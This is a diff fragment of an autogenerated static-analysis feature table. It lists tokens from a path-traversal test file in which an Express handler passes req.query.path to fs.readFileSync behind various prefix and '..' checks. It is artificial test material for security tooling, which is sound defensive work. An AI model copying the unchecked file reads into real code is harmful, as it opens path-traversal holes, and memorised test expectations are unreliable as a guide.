readFileSync path fs readFileSync path | +| autogenerated/TaintedPath/normalizedPaths.js:170:8:170:19 | readFileSync | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:170:8:170:19 | readFileSync | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:170:21:170:24 | path | CalleeFlexibleAccessPath | fs.readFileSync | | autogenerated/TaintedPath/normalizedPaths.js:170:21:170:24 | path | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:170:21:170:24 | path | calleeImports | fs | @@ -8466,6 +73927,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:170:21:170:24 | path | enclosingFunctionName | app.get#functionalargument | | autogenerated/TaintedPath/normalizedPaths.js:170:21:170:24 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:170:21:170:24 | path | receiverName | fs | +| autogenerated/TaintedPath/normalizedPaths.js:173:1:173:3 | app | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:173:1:173:3 | app | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:173:1:173:3 | app | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:173:1:173:7 | app.get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:173:1:173:7 | app.get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:173:1:173:7 | app.get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:173:1:211:2 | app.get ... T OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:173:1:211:2 | app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:173:1:211:2 | app.get ... T OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:173:1:211:2 | exceptional return of app.get ... T OK\\n}) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:173:1:211:2 | exceptional return of app.get ... T OK\\n}) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:173:1:211:2 | exceptional return of app.get ... T OK\\n}) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:173:5:173:7 | get | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:173:5:173:7 | get | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:173:5:173:7 | get | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:173:9:173:26 | '/join-regression' | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:173:9:173:26 | '/join-regression' | InputArgumentIndex | 0 | | autogenerated/TaintedPath/normalizedPaths.js:173:9:173:26 | '/join-regression' | calleeImports | express | @@ -8473,6 +73949,21 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:173:9:173:26 | '/join-regression' | contextSurroundingFunctionParameters | | | autogenerated/TaintedPath/normalizedPaths.js:173:9:173:26 | '/join-regression' | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:173:9:173:26 | '/join-regression' | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:173:28 | fs | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:173:28 | fs | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:173:28 | fs | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:173:28 | fs | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:173:28 | fs | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:173:28 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:173:28 | pathModule | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:173:28 | pathModule | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:173:28 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:173:28 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:211:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:211:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:211:1 | 'arguments' object of anonymous function | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:211:1 | 'arguments' object of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:211:1 | 'arguments' object of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:173:29:211:1 | (req, r ... OT OK\\n} | CalleeFlexibleAccessPath | app.get | | autogenerated/TaintedPath/normalizedPaths.js:173:29:211:1 | (req, r ... OT OK\\n} | InputArgumentIndex | 1 | | autogenerated/TaintedPath/normalizedPaths.js:173:29:211:1 | (req, r ... OT OK\\n} | calleeImports | express | @@ -8480,6 +73971,131 @@ tokenFeatures | autogenerated/TaintedPath/normalizedPaths.js:173:29:211:1 | (req, r ... OT OK\\n} | contextSurroundingFunctionParameters | (req, res) | | autogenerated/TaintedPath/normalizedPaths.js:173:29:211:1 | (req, r ... OT OK\\n} | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | | autogenerated/TaintedPath/normalizedPaths.js:173:29:211:1 | (req, r ... OT OK\\n} | receiverName | app | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:211:1 | exceptional return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:211:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:211:1 | exceptional return of anonymous function | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:211:1 | exceptional return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:211:1 | exceptional return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:211:1 | return of anonymous function | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:211:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:211:1 | return of anonymous function | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:211:1 | return of anonymous function | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:173:29:211:1 | return of anonymous function | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:173:30:173:32 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:173:30:173:32 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:173:30:173:32 | req | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:173:30:173:32 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:173:30:173:32 | req | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:173:30:173:32 | req | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:173:30:173:32 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:173:30:173:32 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:173:30:173:32 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:173:30:173:32 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:173:35:173:37 | res | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:173:35:173:37 | res | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:173:35:173:37 | res | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:173:35:173:37 | res | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:173:35:173:37 | res | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:174:7:174:10 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:174:7:174:10 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:174:7:174:10 | path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:174:7:174:10 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:174:7:174:10 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:174:7:174:27 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:174:7:174:27 | path | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:174:7:174:27 | path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:174:7:174:27 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:174:7:174:27 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:174:7:174:27 | path = ... ry.path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:174:7:174:27 | path = ... ry.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:174:7:174:27 | path = ... ry.path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:174:7:174:27 | path = ... ry.path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:174:7:174:27 | path = ... ry.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:174:14:174:16 | req | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:174:14:174:16 | req | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:174:14:174:16 | req | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:174:14:174:16 | req | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:174:14:174:16 | req | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:174:14:174:22 | req.query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:174:14:174:22 | req.query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:174:14:174:22 | req.query | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:174:14:174:22 | req.query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:174:14:174:22 | req.query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:174:14:174:27 | req.query.path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:174:14:174:27 | req.query.path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:174:14:174:27 | req.query.path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:174:14:174:27 | req.query.path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:174:14:174:27 | req.query.path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:174:18:174:22 | query | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:174:18:174:22 | query | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:174:18:174:22 | query | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:174:18:174:22 | query | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:174:18:174:22 | query | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:174:24:174:27 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:174:24:174:27 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:174:24:174:27 | path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:174:24:174:27 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:174:24:174:27 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:179:7:179:16 | pathModule | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:179:7:179:16 | pathModule | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:179:7:179:16 | pathModule | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:179:7:179:16 | pathModule | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:179:7:179:16 | pathModule | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:179:7:179:27 | pathMod ... bsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:179:7:179:27 | pathMod ... bsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:179:7:179:27 | pathMod ... bsolute | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:179:7:179:27 | pathMod ... bsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:179:7:179:27 | pathMod ... bsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:179:7:179:33 | exceptional return of pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:179:7:179:33 | exceptional return of pathMod ... e(path) | contextSurroundingFunctionParameters | | +| autogenerated/TaintedPath/normalizedPaths.js:179:7:179:33 | exceptional return of pathMod ... e(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:179:7:179:33 | exceptional return of pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:179:7:179:33 | exceptional return of pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:179:7:179:33 | pathMod ... e(path) | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:179:7:179:33 | pathMod ... e(path) | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:179:7:179:33 | pathMod ... e(path) | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:179:7:179:33 | pathMod ... e(path) | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:179:7:179:33 | pathMod ... e(path) | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:179:18:179:27 | isAbsolute | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:179:18:179:27 | isAbsolute | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:179:18:179:27 | isAbsolute | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:179:18:179:27 | isAbsolute | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:179:18:179:27 | isAbsolute | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:179:37:179:40 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:179:37:179:40 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:179:37:179:40 | path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:179:37:179:40 | path | enclosingFunctionName | app.get#functionalargument | +| autogenerated/TaintedPath/normalizedPaths.js:179:37:179:40 | path | fileImports | express fs is-path-inside path path-is-inside sanitize-filename slash url | +| autogenerated/TaintedPath/normalizedPaths.js:179:50:179:53 | path | contextFunctionInterfaces | allowPath(requestPath, rootPath) | +| autogenerated/TaintedPath/normalizedPaths.js:179:50:179:53 | path | contextSurroundingFunctionParameters | (req, res) | +| autogenerated/TaintedPath/normalizedPaths.js:179:50:179:53 | path | enclosingFunctionBody | req res path req query path pathModule isAbsolute path path path path startsWith / path path path startsWith /x path path path startsWith . path path fs readFileSync path pathModule isAbsolute path fs readFileSync path fs readFileSync path path includes .. fs readFileSync path fs readFileSync path path includes .. pathModule isAbsolute path fs readFileSync path fs readFileSync path normalizedPath pathModule normalize path normalizedPath startsWith /home/user/www fs readFileSync normalizedPath fs readFileSync normalizedPath normalizedPath startsWith /home/user/www normalizedPath startsWith /home/user/public fs readFileSync normalizedPath fs readFileSync normalizedPath | +| autogenerated/TaintedPath/normalizedPaths.js:179:50:179:53 | path | enclosingFunctionName | 